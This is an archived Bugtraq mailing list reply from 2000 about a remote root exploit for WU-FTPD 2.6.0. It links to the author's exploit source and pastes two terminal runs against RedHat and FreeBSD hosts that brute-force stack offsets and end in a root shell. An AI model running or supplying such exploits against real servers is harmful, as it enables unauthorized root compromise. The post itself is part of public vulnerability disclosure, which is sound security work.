Bugtraq mailing list archives
Re: WuFTPD: Providing *remote* root since at least 1994
From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Sat, 1 Jul 2000 17:12:35 +0200
> Has anyone come out with a working version of this exploit script? Both
> versions provided on the securityfocus.com web site, and/or the one
> distributed here by TF8, are not working, even after I fixed his code. Do we
> know for sure the thing even exists? I dunno, can anyone direct me to the
> actual code, because I have yet to see a working version of it that doesn't
> CORE dump.

sure? both, tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c), work on my redhat and bsd boxes:

lubi:venglin:~> ./b -t 4 pedagog
Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM
Connected to pedagog. Trying to log in.
Logged in as ftp.
Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
at offset 1080
at offset 1088
at offset 1096
RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100
Reply size: 289, New RET: 0x80758bf
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
0000000000000000000000000000000
Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
/
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

another example:

lubi:venglin:~> ./b localhost
Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports
Connected to localhost. Trying to log in.
Logged in as ftp.
Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076
Reply size: 527, New RET: 0x80b1d01
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
00000000000000000000000000000000000000000000000000000000000000
FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54 CET 2000 venglin () lubi xxx xxx xx:/mnt/elite/usr/src/sys/compile/GADACZKA i386
/
uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator)

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *